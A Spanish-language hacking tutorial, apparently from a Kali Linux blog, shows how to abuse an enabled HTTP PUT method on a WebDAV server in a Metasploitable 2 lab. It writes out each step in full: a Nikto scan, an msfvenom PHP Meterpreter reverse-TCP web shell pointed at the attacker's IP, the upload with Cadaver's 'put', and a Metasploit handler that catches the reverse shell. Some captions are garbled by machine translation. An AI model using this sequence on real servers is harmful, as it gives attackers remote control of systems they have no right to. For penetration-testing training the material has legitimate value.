Tutoriales

Cadaver: aprovecha la vulnerabilidad HTTP PUT

Cadaver es un cliente WebDAV de línea de comandos para UNIX. Admite cargar y descargar un archivo a WebDAV. Cadáver viene preinstalado con Kali Linux. También podemos cargar shells web a un sistema vulnerable usando el método HTTP PUT.

El método PUT se introdujo originalmente como uno de los métodos HTTP utilizados para el trabajo de administración de archivos. El problema es que si el método HTTP PUT está habilitado en un servidor web, se puede usar para cargar elementos maliciosos en el servidor de destino. ¿Estás pensando en un shell web?

Para confirmar que un sistema objetivo tiene el método HTTP PUT que nos permite cargar shells maliciosos, podemos escanear nuestro objetivo con Nikto. Aquí ejecutamos Metasploitable 2 como ejemplo.

Ejecutar metasploitable2

Escaneamos este servidor web vulnerable con Nikto usando el siguiente comando:

nikto -h http://172.17.0.2/dav/

En la captura de pantalla a continuación podemos ver que esta aplicación web vulnerable nos permite guardar archivos en el servidor web usando el método HTTP PUT:

Las aplicaciones web vulnerables nos permiten guardar archivos en el servidor web utilizando el método HTTP PUT
La aplicación web permite guardar archivos en el servidor web mediante el método HTTP PUT

Ahora necesitamos un shell web para cargar aquí. Podemos utilizar msfvenom o cualquier otro método. Para msfvenom, necesitamos ejecutar el siguiente comando para crear un shell web.

msfvenom -p php/meterpreter/reverse_tcp lhost=172.17.0.1 lport=4444 -f raw

Aquí el lhost es la dirección IP de nuestro sistema atacante (en nuestro caso 172.17.0.1). Después de ejecutar el comando msfvenom, se creará la puerta trasera RAW como podemos ver en la siguiente captura de pantalla:

Shell web RAW php

Ahora podemos crear un shell.php (cualquier nombre con la extensión de archivo .php) e insertar allí la carga útil / shell marcada. Ahora se puede cargar.

Como se mencionó anteriormente, Cadaver es una herramienta de línea de comandos preinstalada en la máquina Kali que permite cargar y descargar un archivo en WebDAV. Primero necesitamos especificar nuestro destino con Cadaver con el siguiente comando:

cadaver http://172.17.0.2/dav/

Luego necesitamos pegar nuestro archivo php de shell web con el siguiente comando:

put /home/kali/testshell.php

En la captura de pantalla a continuación, podemos ver que hemos subido correctamente nuestro shell web a nuestro servidor web de destino.

Carcasa cargada concha en la web

Ahora, cuando actualizamos nuestro sitio web de destino, podemos ver que el shell web de Cadaver se ha subido a este servidor.

Cadaver subió la carga útil web al servidor

Ahora podemos aprovecharlo con msfconsole. Necesitamos ejecutar el comando msfconsole en nuestro terminal para abrir la consola de Metasploit Framework.

msfconsole

Después de abrir msfconsole Configuramos nuestro controlador, configuramos la carga útil, configuramos lhost (IP del atacante), configuramos lport y lo aprovechamos usando los siguientes comandos uno por uno.

use exploit/multi/handler
set payload php/meterpreter/reverse_tcp
set lhost 172.17.0.1
set lport 4444
exploit

Entonces se inicia nuestro controlador de TCP inverso. Ahora debemos hacer clic en nuestra carga útil en el sitio web.

solo un clic para aprovecharlo

¡¡BINGO!! TENEMOS CONCHA INVERTIDA.

Tengo almeja

Entonces podemos aprovechar la vulnerabilidad HTTP PUT con Cadáver con nuestro Kali Linux Sistema.

invincibale gif gracioso

Este método se utiliza para cambiar o eliminar los archivos en el sistema de archivos del servidor de destino. También existe un mayor riesgo de varias vulnerabilidades de carga de archivos y esta vulnerabilidad dará lugar a varios ciberataques peligrosos. Para que los servidores sean más seguros, sugerimos que los servidores seguros de acceso limitado de la organización deben tener los permisos de acceso a archivos restringidos a personas autorizadas si la organización va a utilizar esto.
Método HTTP PUT.

¿Te encantan nuestros artículos? Asegúrate de eso Síganos en Gorjeo y GitHub publicamos actualizaciones de artículos allí. A unirse a nosotros KaliLinuxIn Familia ven a nosotros Grupo de telegramas. Estamos tratando de construir una comunidad para Linux y ciberseguridad. Siempre estamos felices de ayudar a todos en el como sección. Como sabemos, nuestra sección de comentarios siempre está abierta a todos. Leemos cada comentario y siempre respondemos.

Publicaciones relacionadas

Deja una respuesta

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *

Botón volver arriba